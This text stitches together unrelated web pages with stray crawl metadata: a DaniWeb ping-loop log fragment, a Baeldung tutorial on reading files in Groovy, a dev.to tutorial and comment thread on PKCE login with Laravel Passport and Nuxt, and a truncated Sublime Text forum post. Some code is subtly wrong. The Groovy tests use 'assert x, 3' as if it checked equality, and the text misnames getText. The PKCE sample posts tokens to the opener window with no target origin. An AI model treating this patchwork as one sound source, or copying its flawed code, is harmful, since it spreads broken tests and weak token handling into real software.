[12:48:44.979000] Success [12:48:49.213000] Timed out [12:48:49.466000] Success [12:48:53.212000] Timed out [12:48:53.467000] Success [12:48:57.216000] Timed out [12:48:57.495000] Success [12:49:01.722000] Timed out [12:49:01.980000] Success [12:49:06.212000] Timed out [12:49:06.469000] Success [12:49:10.214000] Timed out [12:49:10.476000] Success [12:49:14.713000] Timed out The alternating success and time outs was when the device was truly down. I need to somehow clear out the return code, but I'm not sure how to do that. Thanks!
https://www.daniweb.com/programming/software-development/threads/463402/ping-looping-help
CC-MAIN-2018-05
refinedweb
435
80.99
Reading a File in Groovy Last modified: February 9, 2019 1. Overview In this quick tutorial, we’ll explore different ways of reading a file in Groovy. Groovy provides convenient ways to handle files. We’ll concentrate on the File class which has some helper methods for reading files. Let’s explore them one by one in the following sections. 2. Reading a File Line by Line There are many Groovy IO methods like readLine and eachLine available for reading files line by line. 2.1. Using File.withReader Let’s start with the File.withReader method. It creates a new BufferedReader under the covers that we can use to read the contents using the readLine method. For example, let’s read a file line by line and print each line. We’ll also return the number of lines: int readFileLineByLine(String filePath) { File file = new File(filePath) def line, noOfLines = 0; file.withReader { reader -> while ((line = reader.readLine()) != null) { println "${line}" noOfLines++ } } return noOfLines } Let’s create a plain text file fileContent.txt with the following contents and use it for the testing: Line 1 : Hello World!!! Line 2 : This is a file content. Line 3 : String content Let’s test out our utility method: def 'Should return number of lines in File given filePath' () { given: def filePath = "src/main/resources/fileContent.txt" when: def noOfLines = readFile.readFileLineByLine(filePath) then: noOfLines noOfLines instanceof Integer assert noOfLines, 3 } The withReader method can also be used with a charset parameter like UTF-8 or ASCII to read encoded files. Let’s see an example: new File("src/main/resources/utf8Content.html").withReader('UTF-8') { reader -> def line while ((line = reader.readLine()) != null) { println "${line}" } } 2.2. Using File.eachLine We can also use the eachLine method: new File("src/main/resources/fileContent.txt").eachLine { line -> println line } 2.3. Using File.newInputStream with InputStream.eachLine Let’s see how we can use the InputStream with eachLine to read a file: def is = new File("src/main/resources/fileContent.txt").newInputStream() is.eachLine { println it } is.close() When we use the newInputStream method, we have to deal with closing the InputStream. If we use the withInputStream method instead, it will handle closing the InputStream for us: new File("src/main/resources/fileContent.txt").withInputStream { stream -> stream.eachLine { line -> println line } } 3. Reading a File into a List Sometimes we need to read the content of a file into a list of lines. 3.1. Using File.readLines For this, we can use the readLines method which reads the file into a List of Strings. Let’s have a quick look at an example that reads file content and returns a list of lines: List<String> readFileInList(String filePath) { File file = new File(filePath) def lines = file.readLines() return lines } Let’s write a quick test using fileContent.txt: def 'Should return File Content in list of lines given filePath' () { given: def filePath = "src/main/resources/fileContent.txt" when: def lines = readFile.readFileInList(filePath) then: lines lines instanceof List<String> assert lines.size(), 3 } 3.2. Using File.collect We can also read the file content into a List of Strings using the collect API: def list = new File("src/main/resources/fileContent.txt").collect {it} 3.3. Using the as Operator We can even leverage the as operator to read the contents of the file into a String array: def array = new File("src/main/resources/fileContent.txt") as String[] 4. Reading a File into a Single String 4.1. Using File.text We can read an entire file into a single String simply by using the text property of the File class. Let’s have a look at an example: String readFileString(String filePath) { File file = new File(filePath) String fileContent = file.text return fileContent } Let’s verify this with a unit test: def 'Should return file content in string given filePath' () { given: def filePath = "src/main/resources/fileContent.txt" when: def fileContent = readFile.readFileString(filePath) then: fileContent fileContent instanceof String fileContent.contains("""Line 1 : Hello World!!! Line 2 : This is a file content. Line 3 : String content""") } 4.2. Using File.getText If we use the getTest(charset) method, we can read the content of an encoded file into a String by providing a charset parameter like UTF-8 or ASCII: String readFileStringWithCharset(String filePath) { File file = new File(filePath) String utf8Content = file.getText("UTF-8") return utf8Content } Let’s create an HTML file with UTF-8 content named utf8Content.html for the unit testing: Let’s see the unit test: def 'Should return UTF-8 encoded file content in string given filePath' () { given: def filePath = "src/main/resources/utf8Content.html" when: def encodedContent = readFile.readFileStringWithCharset(filePath) then: encodedContent encodedContent instanceof String } 5. Reading a Binary File with File.bytes Groovy makes it easy to read non-text or binary files. By using the bytes property, we can get the contents of the File as a byte array: byte[] readBinaryFile(String filePath) { File file = new File(filePath) byte[] binaryContent = file.bytes return binaryContent } We’ll use a png image file, sample.png, with the following contents for the unit testing: Let’s see the unit test: def 'Should return binary file content in byte array given filePath' () { given: def filePath = "src/main/resources/sample.png" when: def binaryContent = readFile.readBinaryFile(filePath) then: binaryContent binaryContent instanceof byte[] binaryContent.length == 329 } 6. Conclusion In this quick tutorial, we’ve seen different ways of reading a file in Groovy using various methods of the File class along with the BufferedReader and InputStream. The complete source code of these implementations and unit test cases can be found in the GitHub project.
https://www.baeldung.com/groovy-file-read
CC-MAIN-2019-26
refinedweb
947
58.89
Created on 2016-03-18.00:08:39 by darjus, last changed 2017-11-04.20:31:48 by jeff.allen. Fixed as of Mar 19, 2016 6:56:12 PM io.netty.channel.ChannelInitializer exceptionCaught WARNING: Failed to initialize a channel. Closing: [id: 0xabe1bf32, /127.0.0.1:63059 => /127.0.0.1:63054] Traceback (most recent call last): File "/Users/darjus/Documents/jython/dist/Lib/_socket.py", line 639, in initChannel child._ensure_post_connect() File "/Users/darjus/Documents/jython/dist/Lib/_socket.py", line 1421, in _ensure_post_connect self._post_connect() File "/Users/darjus/Documents/jython/dist/Lib/_socket.py", line 877, in _post_connect self.channel.pipeline().addLast(self.python_inbound_handler) SystemError: __getattribute__ not found on type DefaultChannelPipeline Looks like there's a bug in the new synchronization code. Found it while running some unrelated stuff. Hey. Is there a way to reproduce this issue (on a fast system)? Does someone have jstack output available for the deadlock? Fixed by Not sure if its actually related to this problem or not as its closed but a CI build just experienced something related to this. See: After. I agree with Jeff's analysis. Clearly the necessary cycle of waiting to get a deadlock was caused by what #2536 identified, finally blocks for releasing internal locks not being called due to out of memory errors. (This scenario violated the contract that we assumed through the usage of ConcurrentHashMap.) Other than that issue, we have had no reports of other deadlocks in this specific code; and I also do not see any deadlock path in the use of class_to_type. We should also synchronize fromClassSkippingInners. This change restores correctness. Next, let's look at our caching, and its corresponding performance. Using weak keys/weak values in class_to_type means that when working with Java objects (calling methods, accessing attributes), Python code that does not maintain a strong reference to the Java class will cause the Jython runtime to constantly rebuild these entries in class_to_type. Here are the ways that such strong references would be established: 1. exposedTypes (so Jython's internals) 2. imports of Java classes into a Python namespace 3. references to `type(java_obj)` 4. subclassing of a Java class by a Python class References to Java *objects*, including objects from factory methods; indirect construction, such as `java.util.HashMap()`; and callbacks (Netty, re/json/strptime) would not introduce such references to Python types for Java *classes*. But calling methods, using attributes, or otherwise using getting the Python type on the Java object, would require this entry in class_to_type to be added, potentially to be potentially quickly discarded by generational GC. Computing these entries is relatively expensive, especially if a given class C has inner classes (and this is a general type graph expansion). See also the analysis in (scenario 3); our mapping in class_to_type is a common pattern seen in Java systems. What if instead of current one-level cache, we had a two-level cache? Level 1 uses weak key/weak value for the class/type entries (C, T); (C, T) entries that are expired from Level 1 are moved to Level 2; Level 2 uses an expiration time so a ClassLoader could be unloaded in say some reasonable amount of time. To implement: 1. Level 1 cache is a direct replacment of class_to_type with CacheBuilder weak keys/weak values/removal listener. Also we will not attempt to expose it as a Map going forward; adjust class_to_type usage accordingly. 2. Level 2 cache is weak keys/strong values/expires after write. We can tune this expiration as was done with the regex cache and the python.sre.cachespec option,). 3. For removalListener: (C, T) entries that are removed from Level 1 will use removalListener to get placed in Level 2 (safe because Level 1 is concurrent; and obviously hard refs would prevent it from being removed while under construction). 4. Try both caches when looking up the type T for class C. Because synchronized, there's no visible inconsistency; if no entry for C because it was removed, simply recompute T'. There is a small window of time that it could be in the process of being moved to Level 2, but this does not affect correctness; (C, T) will be eventually expired from Level 2 and (C, T') is a valid repllacement for it (because there can be no hard refs to T outside the level 2 cache itself). Lastly, looks potentially useful as an alternative for publishing PyType objects into a cache. But we need to address two key questions: 1. Whether ClassValue#computeValue would work properly in the re-entrant case where the class graph from a given class C is explored, as is done for inners, possibly referring back to C. This is why we could not get the publication of the type in the map done after the init (as one would usually want to do!) in (putIfAbsent); class C would be referenced, and it would attempt to build again (and stack overflow). No solution I tried could break this problem. 2. When to call ClassValue#removeValue ! We still have to keep track of the cache with respect to PyType. I'd like to believe we fixed this with #2609 in, and that the reworking of PyType in has addressed concerns people might have about needless locking. The critical similarity is a type not having an attribute you know it does, and the explanation is that you looked before we finished constructing it. Can anyone produce evidence to the contrary?
http://bugs.jython.org/issue2487
CC-MAIN-2018-05
refinedweb
921
56.15
TUTORIALS FORUMS Flash Basics / Animation ActionScript Special Effects HTML5 CSS / HTML Basics Animation JavaScript Common Tasks Windows Phone Get Help Modifying SL Animations Using C# - Page 3 by kirupa | 7 November 2008 In the previous page, you looked at your animation in fairly great detail and gave the keyframes responsible for animating your gradient a name - Color0 and Color1. In this page, let's add some code to make all of this work. Adding the CodeYou already have some code already that plays your animation when you click on the button. What we are going to do is modify our code to have a random color be picked when you click on the Randomize Color button instead of having the same animation play just once. Let's do that now. Open this same project in Visual Studio by going to your Project pane, right-clicking on your solution icon, and selecting Edit in Visual Studio: [ you can choose to Edit in Visual Studio directly from the project pane ] A few seconds later, Visual Studio will open. Open Page.xaml.cs inside it, and you will see the following code displayed: The RandomizeColors method is the event handler your Button's click event is hooked up to, so each time you click your button, the RandomizeColors method gets called. Currently, your code just plays the ChangeColor storyboard by calling the Begin method on it. We are going to modify this a bit. Look at your code and add the following lines shown below. You can also just copy everything below and just overwrite everything below your line containing your namespace declaration if you find that easier: Once you have copied and pasted the above code, run your app from either inside Visual Studio or Expression Blend by pressing F5. You should not receive any errors, and you will see your app appear as before. The difference is that, when you click (and keep clicking) on your Randomize Color button, your animation plays each time with a different color. At this point, you have a fully working application that does essentially what you want it to do. There is one more thing left though, and that is seeing why the code works the way it does. We'll do that on the next page. Onwards to the next page! 1 | 2 | 3 | 4 Link to Us © 1999 - 2012
https://www.kirupa.com/blend_silverlight/modifying_animation_sl2_pg3.htm
CC-MAIN-2021-17
refinedweb
396
66.47
In this post I will show you how you can use PKCE(Proof Key for Code Exchange) for authentication. I will use Nuxt.js, because that's what I use in my day to day workflow, but I will try to make it as generic as possible so that it can be implemented in other frameworks or even in vanilla javascript. The Proof Key for Code Exchange extension is. The basic workflow of the PKCE is this: - User requests to login - The SPA makes a random string for stateand for code_verifier, then it hashes the code_verifier(we will use SHA256as hashing algorithm), and it converts it to base64url safe string, that's our code_challenge. Then it saves the stateand code_verifier. - Make a GETrequest to the backend with the query parameters needed: client_id, redirect_uri, response_type, scope, state, code_challengeand code_challenge_method(there can be other required paramateres) - The user is redirected to the backend loginpage - The user submits it's credentials - The backend validates the submited credentials and authenticates the user - The backend then proceeds to the intended url from step 3 - It returns a response containing codeand state - SPA then checks if the returned stateis equal as the statethat was saved when we made the initial request (in step 2) - If it is the same, the SPA makes another request with query parameters grant_type, client_id, redirect_uri, code_verifier(that we saved in step 2) and code(that was returned by the backend) to get the token For those who are lazy and don't want to read yet another post. Here are the links for the github repositories: Table of contents Backend I will assume that you already have Laravel application set up, so I will go directly to the important parts of this post. Setting Laravel Passport We will use Laravel Passport which provides a full OAuth2 server implementation for your Laravel application. Specifically we will use the Authorization Code Grant with PKCE. As stated in the passport documentation The Authorization Code grant with "Proof Key for Code Exchange" (PKCE) is a secure way to authenticate single page applications or native applications to access your API. This grant should be used when you can't guarantee that the client secret will be stored confidentially or in order to mitigate the threat of having the authorization code intercepted by an attacker. A combination of a "code verifier" and a "code challenge" replaces the client secret when exchanging the authorization code for an access token. We are going to require the passport through composer composer require laravel/passport Run the migrations php artisan migrate And install passport php artisan passport:install Next we should add HasApiTokens trait to the User model namespace App; use Illuminate\Foundation\Auth\User as Authenticatable; use Illuminate\Notifications\Notifiable; use Laravel\Passport\HasApiTokens; class User extends Authenticatable { use HasApiTokens, Notifiable; // [code] } Register the Passport routes that we need within the boot method of AuthServiceProvider, and set the expiration time of the tokens // [code] use Laravel\Passport\Passport; class AuthServiceProvider extends ServiceProvider { // [code] public function boot() { $this->registerPolicies(); Passport::routes(function ($router) { $router->forAuthorization(); $router->forAccessTokens(); $router->forTransientTokens(); }); Passport::tokensExpireIn(now()->addMinutes(5)); Passport::refreshTokensExpireIn(now()->addDays(10)); } } Set the api driver to passport in config/auth.php // [code] 'guards' => [ 'web' => [ 'driver' => 'session', 'provider' => 'users', ], 'api' => [ 'driver' => 'passport', 'provider' => 'users', 'hash' => false, ], ], // [code] And the last step is to create PKCE client php artisan passport:client --public You are then going to be prompted some questions, here are my answers: Which user ID should the client be assigned to? -> 1 What should we name the client? -> pkce Where should we redirect the request after authorization? -> (your SPA domain) Setting CORS For laravel version < 7 Manually install fruitcake/laravel-cors and follow along, or you can create your own CORS middleware. For laravel version > 7 Change your config/cors.php, so that you add the oauth/token in your paths, and your SPA origin in allowed_origins. My config looks like this return [ 'paths' => ['api/*', 'oauth/token'], 'allowed_methods' => ['*'], 'allowed_origins' => [''], 'allowed_origins_patterns' => [], 'allowed_headers' => ['*'], 'exposed_headers' => [], 'max_age' => 0, 'supports_credentials' => false, ]; Creating the API Create the routes in routes/web.php, now this is important, the routes MUST be placed in routes/web, all the other routes can be in routes/api, but the login route must be in routes/web, because we will need session. Route::view('login', 'login'); Route::post('login', 'AuthController@login')->name('login'); Now, create the login view and the AuthController. In the resources/views create new login.blade.php file and in there we will put some basic form. I won't apply any style to it. <form method="post" action="{{ route('login') }}"> @csrf <label for="email">Email:</label> <input type="text" name="email"> <label for="password">Password:</label> <input type="password" name="password"> <button>Login</button> </form> Make AuthController and create login method in there // [code] public function login(Request $request) { if (auth()->guard()->attempt($request->only('email', 'password'))) { return redirect()->intended(); } throw new \Exception('There was some error while trying to log you in'); } In this method we attempt to login the user with the credentials he provided, if the login is successfull we are redirecting them to the intended url, which will be the oauth/authorize with all the query parameters, if not, it will throw an exception. Ok, that was it for the backend, now let's make the SPA. Frontend Create new nuxt application and select the tools you want to use, I will just use the axios module npx create-nuxt-app <name-of-your-app> Then we are going to need the crypto package for encryption npm install crypto-js Now replace all the code in pages/index.vue with this <template> <div class="container"> <button @click.Login</button> </div> </template> <script> import crypto from 'crypto-js'; export default { data() { return { email: '', password: '', state: '', challenge: '', } }, computed: { loginUrl() { return '*&state=' + this.state + '&code_challenge=' + this.challenge + '&code_challenge_method=S256' } }, mounted() { window.addEventListener('message', (e) => { if (e.origin !== '' || ! Object.keys(e.data).includes('access_token')) { return; } const {token_type, expires_in, access_token, refresh_token} = e.data; this.$axios.setToken(access_token, token_type); this.$axios.$get('') .then(resp => { console.log(resp); }) }); this.state = this.createRandomString(40); const verifier = this.createRandomString(128); this.challenge = this.base64Url(crypto.SHA256(verifier)); window.localStorage.setItem('state', this.state); window.localStorage.setItem('verifier', verifier); }, methods: { openLoginWindow() { window.open(this.loginUrl, 'popup', 'width=700,height=700'); }, createRandomString(num) { return [...Array(num)].map(() => Math.random().toString(36)[2]).join('') }, base64Url(string) { return string.toString(crypto.enc.Base64) .replace(/\+/g, '-') .replace(/\//g, '_') .replace(/=/g, ''); } } } </script> Let me explain what's going on in here - Creating the template, nothing fancy going on in here, we are creating a button and attaching onClickevent that will trigger some function. - In the mountedevent, we are binding an event listener to the window that we are going to use later, we are setting stateto be some random 40 characters string, we are creating verifierthat will be some random 128 character string, and then we are setting the challenge. The challengeis SHA256encrypted verifierstring converted to base64string. And we are setting the stateand the verifierin the localStorage. - Then we have some methods that we've defined. Now the flow look like this - User clicks on the loginbutton - On click it triggers a openLoginWindowfunction, which opens new popup window for the provided url this.loginUrlis a computed property that holds the url on which we want to authorize our app. It consist of base url (), the route for the authorization ( oauth/authorize- this is the route that passport provides for us) and query parameters that we need to pass (you can look for them in the passports documentation): client_id, redirect_uri, response_type, scope, state, code_challengeand code_challenge_method. - The popup opens, and since we are not logged in and the oauth/authorizeroute is protected by authmiddleware, we are redirected to the loginpage, but out intended url is saved in session. - After we submit our credentials and we are successfully logged in, we are the redirected to out intended url (which is the oauth/authorizewith all the query parameters). - And if the query parameters are good, we are redirected to the redirect_urlthat we specified (in my case), with stateand codein the response. - On the authpage, that we are going to create, we need to check if the statereturned from Laravel is the same as the statethat we've saved in the localStorage, if it is we are going to make a postrequest to query parameters: grant_type, client_id, redirect_uri, code_verifier(this is the verifierthat we stored in the localStorage) and code(that was returned by laravel). - If everything is ok, we're going to emmit an event (we're listening for that event in our indexpage) with the response provided by laraavel, in that response is our token. - The event listener function is called and we are setting the token on our axiosinstance. Let's make our auth page so that everything becomes more clear. In pages create new page auth.vue and put this inside <template> <h1>Logging in...</h1> </template> <script> export default { mounted() { const urlParams = new URLSearchParams(window.location.search); const code = urlParams.get('code'); const state = urlParams.get('state'); if (code && state) { if (state === window.localStorage.getItem('state')) { let params = { grant_type: 'authorization_code', client_id: 1, redirect_uri: '', code_verifier: window.localStorage.getItem('verifier'), code } this.$axios.$post('', params) .then(resp => { window.opener.postMessage(resp); localStorage.removeItem('state'); localStorage.removeItem('verifier'); window.close(); }) .catch(e => { console.dir(e); }); } } }, } </script> Everything in here is explained in the 6th and 7th step. But once again, we are getting the state and code from the url, we are checking if the state from the url and the state we've stored in the localStorage are the same, if they are, make a post request to oauth/token with the required parameters and on success, emit an event and pass the laravel response which contains the token. That's it, that's all you have to do, of course this is a basic example, your access_token should be short-lived and it should be stored in the cookies, and your refresh_token should be long-lived and it should be set in httponly cookie in order to secure your application. This was relatively short post to cover all of that, but if you want to know more, you can look at my other post Secure authentication in Nuxt SPA with Laravel as back-end, where I cover these things. If you have any questions or suggestions, please comment below. Discussion Hi, SOLVED: Everything work fine, but now I get When logging in, when returning to nuxt auth.vue I get: x-access-token undefined localhost / Session 23 Is it a backend problem? Problem was the client id in the frontend that was wrong in two files. login and auth Hi, when i want to retrive data (articles) when i'm loggedIn i get this error: Access to XMLHttpRequest at 'domain.com/api/trials/' from origin 'app.domain.com/' has been blocked by CORS policy: Response to preflight request doesn't pass access control check: Redirect is not allowed for a preflight request. // nuxt -> index.vue (works local but not on the domains) async asyncData({ $axios }) { const trials = await $axios.$get(process.env.LARAVEL_ENDPOINT + "/api/trials/"); return { trials }; }, ...... // laravel api route /api/trials Route::group(['middleware' => 'cors'], function() { Route::group(['middleware' => ['auth:api']], function () { Route::resource('trials', 'API\TrialController') ->only(['index', 'store', 'show', 'edit', 'update','destroy']); }); ....... // trialcontroller class TrialController extends Controller { public function __construct() { $this->middleware('auth:api'); } public function index() { $trials = Auth::user()->parentTrials()->get(); ........ If you are using laravel version 6.x, then you should add CORS middleware, if you are using laravel 7.x, you should just setup the CORS that's already there. I use this in the backend: "fruitcake/laravel-cors": "^2.0", I can retrive data with postman if I use the header: Authorization: Bearer eyJ0eXAiOiJKV1Q..... Do i need to set some headers to the nuxt request? async asyncData({ $axios }) { const trials = await $axios.$get(process.env.LARAVEL_ENDPOINT + "/api/trials/"); return { trials }; }, if yes how? i see many others have the same problem You need to send Bearer header with every request Do you have an example? I'm trying with this but I cant get the token async asyncData({ $axios }) { async asyncData (context) { const trials = await $axios.$get(process.env.LARAVEL_ENDPOINT + "/api/trials/", {}, { headers: {"Authorization" : Bearer ${context.app.$auth.getToken('local')}} }) I can se the cookie x-access-token in chrome developer tool under application Now I got the access_token: const access_token = cookies.get('x-access-token'); console.log(access_token); But still no content, only errors: Access to XMLHttpRequest at 'domain.com/api/trials/' from origin 'app.domain.com' has been blocked by CORS policy: Response to preflight request doesn't pass access control check: Redirect is not allowed for a preflight request. cf5ce039ccd82a3e879b.js:1 GET domain.com/api/trials/ net::ERR_FAILED Request URL: domain.com/api/trials/ Referrer Policy: no-referrer-when-downgrade Provisional headers are shown You should do something like this this.$axios.setToken(access_token, token_type); Hi again, Now I need to "update a Post" and the error comes again, but only on the domain not local: Console error: Access to XMLHttpRequest at 'domain.com/api/trials/' from origin 'app.domain.com' has been blocked by CORS policy: Response to preflight request doesn't pass access control check: Redirect is not allowed for a preflight request. 600bbbde120028ba59aa.js:1 POST domain.com/api/trials/ net::ERR_FAILED Laravel log error: [2020-06-22 16:05:59] local.ERROR: The resource owner or authorization server denied the request. {"exception":"object [stacktrace].....\TokenGuard.php(149): Laravel\Passport\Guards\TokenGuard->getPsrRequestViaBearerToken My update submit: UpdateForm(key) { event.preventDefault(); var app = this; You need to setup the correct domain for the CORS But it works for GET (posts) and get users but not update content (post) See if the post request has been enabled for CORS how can I see that? i'm new to cors, its hard to debug when it works local but not on the server Read the documentation for fruitcake/laravel-cors When I read the docs I can't find info on what to change to get post to work . Do you know where to se an example on a Update with "post" have been used, with Nuxt/Passport? almost all examples are just GET Now it works. :) My post looks like: I also removed a / from /api/trials (is was /api/trials/) I will try later to remove some of the code to see if it all have to be there. Firstly, Thank you for your great work! I've been searching for a long time on how to authenticate Vue SPAs with Laravel and found Laravel Passport but it seems that Laravel Passport wasn't made for this purpose! and PKCE is breaking the UX, actually, this prompt is a bit confuses the users. I'm looking for something simple for SPAs. I found an alternative which is Sanctum, I read the intro about it in the docs and found that Scantum was mainly built for SPA. My question about best practices and security, do you recommend using Sanctum instead? If your both applications are on the same top-level domain, yes, it's best to use Sanctrum. If they are not on the same top-level domain, you can't use Sanctrum. Thank you for the fast response <3 Thanks for informative post. I wanted to know if front and back on two domains, can't we use sanctum laravel.com/docs/7.x/sanctum#api-t... api token authentication? You can, but I haven't used it yet. I think it's not as flexible as passport. Why not using @nuxtjs/auth-next module ? If it's not flexible enough, you can make your own scheme like this: schemes/laravelPassport.js: And then use it like this in nuxt.config.js: What you did here is almost the same as if you have done it custom, without using the nuxtjs/auth-next module. So why should we introduce another package in our project if the code is similar?! Hi! Very helpful tutorial! The only inconvenient that I have is that the session starts in the login, and when I tried to revoke the token (the route is under auth:api middleware) the session is not over and when i triy to login again, it skips the login form and jumps to the authorization prompt or just to callback page. I tried to create a route in the web middleware which kills the session but always stores the cookie 'laravel_session' and 'XSRF-TOKEN' and can't delete them. Did this happen to you? Thanks in advance. How do you revoke the token? Yes, not only using but also like indicates the docs: Laravel - revoking tokens This is not working for me because uses the laravel_sessioncookie data to persist login and return a new access_tokenwithout ask for credentials again, redirecting to the callback page directly. Laravel destroy the session after a while or when the browser is closed but it's a problem when I want to change user to login because I have to wait or close everything. Maybe the problem is the session based login, but there is no much info about it. I would like to know if it has happened to you and if anyone could solve it. Sorry about my english, is not my mother tongue. And thanks again! Maybe you should try to revoke the token and clear the users session, maybe that will do it. But I don't know if this is the right way to logout some user... After several trials, I came up with a solution (not an elegant one I guess) that works. It's a mix from logout from the API guard ( api.phproutes with auth:apimiddleware), revoking the token: And in the web guard ( web.phproutes), kill the session: In the frontend I send an axios post request to the logoutAPIroute and then call the logoutSessionroute. Here is the code using the @nuxtjs/auth-nextmodule. This way, every time I logout from the app and login again, the credentials are required and doesn't persists. Thanks for your replies, I hope this helps someone! Hi again; Now im at: logout I can logout on the frontend but the backend (laravel is still logget ind) so if i click login on the frontend the user will get logget ind again. How to logout on the laravel backend so the user have to write the email and password again to login? This dont work: the user is not logget out in the backend Api route: Route::middleware(['auth:api'])->group(function () { Route::post('/logout', 'Auth\AuthWepAppController@logoutApi'); }); AuthWepAppController: public function logoutApi (Request $request) { Hi again Stefan, With the code you have written, the user logges out when refreshing the page, howto handle so the user don't logges out on page refresh? The attached screendump is what I have after page refresh dev-to-uploads.s3.amazonaws.com/i/... On page reload, check for the token in cookies, and if there is a token in the cookies, just set it in axios I did: In authIt.js const access_token = cookies.get('x-access-token'); if no token redirect to /login else store.$axios.$get(process.env.LARAVEL_ENDPOINT+'/api/user') .then(resp => { store.$auth.setUser(resp) ...... Thank you for the excellent tutorial. This is the best tutorial I have found of using Passports PKCE functionality and I would have not been able to figure it out myself. I was able to port your solution today into a React front-end with Laravel back-end. I just have a few questions about using this technique if you have time. 1) If the OAuth2 server knows when the access token expires and therefore won't allow access of an expired token, it seems that its fine to store the access token not in a cookie since our main protection is the quick timeout? (I'm planning on using Redux which is basically session) 2) Does a registration page necessarily now need to send a user to the PKCE flow after registration rather than issue a token using password grant on initial registration? 3) Does PKCE matter for the refresh token exchange? As in, after we have gone to all this trouble to get the access token through PKCE do we shoot ourselves in the foot if we are not using the same precaution on a subsequent refresh token? I'm always storing my short-lived access_tokenin the cookie, and my long-lived refresh_tokenin the httponlycookie, also Laravel has a CSRF protection out of the box. That way I'm protected from potential XSS and CSRF attacks. I think you must use the PKCE flow, because the client_ids are not the same. But I've never tested this, maybe you could try it out and comment here if you could make it work. No, we are having a separate route in which we're refreshing out token. My refresh_tokens expiry time is 10 days, but the user refresh_tokenis newing up every time new access_tokenis requested. So the user will have to go through the whole PKCE flow if they weren't active for 10 days straight. So I have been reading RFCs today...because quarantine and I am actually attempting to understand what "the standard" is. I think the best documents are currently OAuth 2.0 for Browser-Based Apps and Proof Key for Code Exchange by OAuth Public Clients. The interesting part (section 6) in the best practices document (1st link) there is great discussion about choosing an OAuth2 solution based off the architecture you're working with, which makes a lot of sense. Unlocking this critical aspect essentially answered some of my questions. The most important being to realize that if your architecture and requirements don't "need" redirects then there is probably a more secure way to accomplish the task without PKCE, essentially that PKCE would be a less secure option if one can get it done without needing redirects. Maybe that was super obvious but I was just assuming that PKCE is the new standard so everyone needs to switch to it which was causing me to try to jam all the concepts together. 1) Regarding Storing Tokens. I think you were very close (if not 100%) to what is suggested in the best practices with your previous post Secure authentication in Nuxt SPA with Laravel as back-end 2) Regarding User Registration. Based off the above logic an application that also worries about initial user registration probably is in a position architecturally to not need PKCE so it is out of bounds. 3) Regarding Refresh Tokens and PKCE. If one is truly working with a public client (that you really need PKCE) it is the case that issuing refresh tokens is indeed more risk than the access token. In my opinion the separate time expiry you suggested would not increase security, but there are some interesting suggestions for refresh tokens with PKCE in the best practices, including not using them, or using a decreasing expiration refresh token that still needs to be reacquired every 24 hours. Yes, the part with decreasing the refresh_tokenexpiration time is very interesting, and I might try that. Sorry to disturb again. I'm still having problems with, how to get the users info (like name) to show on page (like in the footer). If reloading the webapp I still have the access token but the name I set with this.$auth.setUser(resp.name) is gone. Do you have and example on how to get the webapp to save the user name on reload? I can do it with a cookie, but think that its not safe. You can use the cookies to persist the state or use some package that does that. Don't worry about security, because the user name is not something that should not be publicly visible. Can other users not just change the userId in the local cookie to something else and then get other users info from the api? In my case todos Well, if you've set up your back-end properly, they won't be able to do that With your method here, I'm logged in the Laravel backend. Is it an expected result ? Is there a way to prevent from logging in the backend ? I have the same issue with @nuxtjs/auth (and @nuxtjs/auth-next module). Maybe it's something I'm misunderstanding about using Laravel Passport. Also, why not using Passport Grant Token ? We are using Passport Grant Token You must be logged in the backend if you want to make a request to the backend. Hi, one more question I'm new to passport so what about all the auth tokens in the db? I can see many of them, Are they delete automatic by Laravel passport? SELECT * FROM oauth_access_tokens 5fea03842964060c10590e072ce5571478c4270705caf5c447... 22 1 authToken [] 0 2020-05-14 11:41:19 2020-05-14 11:41:19 2021-05-14 11:41:19 874657bfbafafa674aeac5f5c01b967fa7b95dff71ef4c2c1e... 22 1 ................. No, they are not deleted automatically Hi again, Question about logout: I can do this in the frontend: this.$auth.logout(); But how to logout the laravel backend? I have tried: Nuxt: this.$axios.$post(process.env.LARAVEL_ENDPOINT+'/api/logout') .then(response => {..... Laravel backend: API.php ******************* Route::middleware('auth:api')->group(function () { Route::post('logout', 'Auth\AuthWepAppController@logoutApi')->name('logout'); }); AuthWepAppController ******************* It gives me this error: message": "Call to undefined method Illuminate\Support\Facades\Request::user()", What am I missing? thanks Hi again Stefan I'm trying again to figure out how to logout from the backend. How do you logout on the backend? This dont work: the user is not logget out in the backend Api route: Route::middleware(['auth:api'])->group(function () { Route::post('/logout', 'Auth\AuthWepAppController@logoutApi'); }); AuthWepAppController: public function logoutApi (Request $request) { $request->session()->flush(); } Just get the users token and delete it. Auth::user()->token()->delete Great tutorial. I'm new to Passport and PKCE. What is the "best practice" way on checking if a user is logged in frontend? so instead there will be a logout button and not a login button. You should check if the token exists in the cookies or in the localStorage (wherever you have stored it) I have not stored it yet. The way you store it here is that the best way? dev.to/stefant123/secure-authentic... I think yes, or I still haven't found any better way to do it. Question: we actually DON'T want the user to be stored in the session - because we want the login prompt to be shown each time the user hits oauth/authorize in the client... is this an option? TBH I don't know really, but I guess you could do something like this. For example, when the user hits oauth/authorizeyou can run some middleware that would delete the session for that user, and the login prompt would be shown. Maybe this is the way you could do it, but then again I'm not sure if this would work and why would you want this.
https://practicaldev-herokuapp-com.global.ssl.fastly.net/stefant123/pkce-authenticaton-for-nuxt-spa-with-laravel-as-backend-170n
CC-MAIN-2021-04
refinedweb
4,537
53.1
Hi, all, I am a new user of st2. thanks for reading my questions: (I'm using ST2 on OS X Mountain Lion.) Is there any way to view all currently available tab triggers? (as I can see in textmate's toolbar menu of Bundles...) or is there any plan to add such a menu? I can see many textmate bundle files, in the ~/Library/Application Support Sublime Text 2/Packages/ directory, such as html/HTML.tmLanguage, or some file ending with .tmPreferences... but how can I make use of these files? In Textmate, when I edit html files, I can use supper + b to wrap text with , super + i to wrap with , how to do so (other keybinds are ok.) in ST2? When I edit a rails view template file (.html.eb), syntax scope chosen as HTML(Rails), "if + tab" gives me php code: <?php if (condition): ?><?php endif ?>, why? thanks! Hi xiaolai, I'm having the same issues. Although I love TM, I wanted to move to something that was under active development and I had confidence in so I purchased ST2 after trying it for a week. Unfortunately I was working on a PHP project at the time and didn't realise the lack of support ST2 has for rails development out of the box (my bad). The if+tab inserting a php block is a bug due to the scope of the php snippet which is covered in another post in this forum. I've spent several hours googling for help on ST2 + rails and have come to the conclusion that you have to either role your own or install a package from the community. Personally I dislike both of these options, as a freelance developer I tend to see my editor as a tool and dont want to spend time messing with it, and I'd prefer to have the company that developed the editor create the required plugins as I have more faith in the quality of their code etc. I'm sure I'll get hammered for my opinions as there are a lot of people who love ST2, I'm one of those people who are happy to pay for good software and ST2 is definitely worth the money it cost me, but I'm contemplating moving to 